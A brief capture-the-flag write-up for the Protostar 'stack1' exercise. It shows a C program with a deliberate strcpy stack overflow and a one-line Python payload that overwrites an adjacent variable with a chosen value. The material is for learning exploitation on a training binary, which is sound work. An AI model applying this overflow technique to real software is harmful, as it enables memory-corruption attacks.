# Stack1

## Source Code

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}
```

## Challenge

In this challenge we needed to modify the `modified` variable with a specific value (i.e, 0x61626364)
clearly from looking at the source code this it is clear that this challenge is vulnerable to stack buffer overflow as it uses strcpy so we can modify the value of `modified` by passing a string more than 64 bytes and after that the hex values 0x61626364 in little endian format `0x64636261` so hence i created a script with this payload

```/opt/protostar/bin/stack1 `python -c "print 'A'*64 + '\x64\x63\x62\x61'"` ```

Hurraayyy! we cleared level 2!